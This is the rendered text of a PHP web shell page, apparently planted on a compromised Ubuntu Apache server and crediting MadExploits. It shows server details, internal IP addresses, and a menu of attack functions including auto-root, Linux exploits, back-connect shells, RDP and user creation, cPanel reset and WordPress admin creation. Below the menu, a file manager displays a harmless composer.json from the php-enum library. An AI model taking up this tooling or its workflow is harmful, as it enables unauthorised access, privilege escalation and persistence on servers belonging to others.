Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
vendor /
myclabs /
php-enum /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-x--x
LICENSE
1.05
KB
-rwxr-x--x
README.md
3.86
KB
-rwxr-x--x
SECURITY.md
279
B
-rwxr-x--x
composer.json
781
B
-rwxr-x--x
psalm.xml
582
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "myclabs/php-enum", "type": "library", "description": "PHP Enum implementation", "keywords": ["enum"], "homepage": "http://github.com/myclabs/php-enum", "license": "MIT", "authors": [ { "name": "PHP Enum contributors", "homepage": "https://github.com/myclabs/php-enum/graphs/contributors" } ], "autoload": { "psr-4": { "MyCLabs\\Enum\\": "src/" } }, "autoload-dev": { "psr-4": { "MyCLabs\\Tests\\Enum\\": "tests/" } }, "require": { "php": ">=7.1", "ext-json": "*" }, "require-dev": { "phpunit/phpunit": "^7", "squizlabs/php_codesniffer": "1.*", "vimeo/psalm": "^3.8" } }
Close